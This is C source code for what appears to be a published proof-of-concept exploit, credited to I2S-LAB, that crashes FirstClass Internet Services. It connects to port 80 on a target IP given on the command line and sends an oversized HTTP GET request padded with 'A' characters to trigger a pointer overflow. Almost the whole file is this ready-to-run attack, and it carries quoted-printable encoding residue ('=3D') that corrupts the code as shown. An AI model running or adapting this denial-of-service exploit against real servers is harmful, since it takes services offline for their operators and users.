/*******************************************
 * FirstClass Internet Services Remote DoS *
 *******************************************

discovered & coded by I2S-LAB

 --------------------------------------------

This exploit uses a ptr overflow to remotely
shutdown the Internet Services of FirstClass.


  CONTACT
  _______

  Fred CHAVEROT : fred[at]I2S-LAB.com
  Aur=E9lien BOUDOUX : aurelien[at]I2S-LAB.com


  URL : http://www.I2S-LaB.com

 *******************************************/


#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")

#define PerfectOverwrite 246

void main (int argc, char *argv[])
{

int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;

WSADATA wsadata;
WORD wVersionRequested =3D MAKEWORD (2,0);

printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
"http://www.I2S-LaB.com\n\n");


if (!argv[1])
{
printf ("Usage : %s <IP Address>\n", argv[0]);
ExitProcess (0);
}

if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);

if (!(sav =3D (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0);
};

lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");

sin.sin_family =3D AF_INET;
sin.sin_port =3D htons (80);

if ( (sin.sin_addr.s_addr=3Dinet_addr (argv[1])) =3D=3D INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}

sock1 =3D socket (AF_INET, SOCK_STREAM, 0);

printf ("\nconnecting to %s...", argv[1]);

if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) =3D=3D SOCKET_ERROR )
printf ("connection failed!\n");

else
{
printf ("ok!\nSending crafted request...");

send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
}

closesocket (sock1);
}